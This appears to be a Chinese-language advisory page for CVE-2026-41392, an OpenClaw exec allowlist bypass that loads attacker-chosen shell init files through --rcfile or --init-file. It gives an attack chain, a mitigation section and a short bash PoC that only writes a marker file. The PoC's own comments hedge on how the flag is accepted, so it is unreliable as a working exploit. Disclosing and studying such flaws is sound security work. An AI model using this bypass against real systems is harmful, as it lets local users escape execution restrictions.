CVE-2026-41392 CVSS 6.7 中危

CVE-2026-41392 OpenClaw执行允许列表绕过漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41392

漏洞类型

权限绕过

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前的版本存在exec allowlist绕过漏洞。攻击者可通过Shell初始化文件包装调用继承allowlist信任，利用--rcfile等Shell选项加载攻击者选择的初始化文件，从而绕过exec allowlist匹配限制。

技术细节

该漏洞的核心在于OpenClaw未能正确过滤传递给Shell程序的启动参数。攻击者利用本地低权限，通过传递如--rcfile、--init-file或--startup-file等参数，可以指定一个自定义的初始化脚本。由于allowlist机制仅校验主程序路径而忽略了这些初始化参数，恶意脚本得以在受信任的上下文中加载并执行。这使得攻击者能够绕过原本旨在限制可执行文件的安全策略，执行任意命令，进而窃取数据或破坏系统。

攻击链分析

STEP 1

1. 信息收集

攻击者确认目标系统运行的是OpenClaw 2026.3.31之前的版本。

STEP 2

2. 准备恶意文件

攻击者创建包含恶意命令的Shell初始化文件（如.bashrc或自定义脚本）。

STEP 3

3. 触发漏洞

攻击者调用OpenClaw或相关Shell，并传入--rcfile或--init-file参数指向恶意文件。

STEP 4

4. 执行代码

由于allowlist校验被绕过，恶意初始化文件被加载执行，获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-41392: OpenClaw exec allowlist bypass
# Create a malicious initialization file
echo 'echo "CVE-2026-41392 POC executed" > /tmp/exploit_success' > /tmp/malicious_rc.sh

# Exploit the vulnerability by invoking the shell with the init-file
# This simulates how an attacker might bypass the allowlist check
# Assuming OpenClaw wraps the execution or allows these flags
openclaw --init-file /tmp/malicious_rc.sh

# Check if the exploit worked
if [ -f /tmp/exploit_success ]; then
    cat /tmp/exploit_success
else
    echo "Exploit failed"
fi

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

在未升级补丁前，建议严格限制本地用户权限，并禁用或移除不必要的Shell初始化文件，同时加强对OpenClaw进程启动参数的日志审计。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表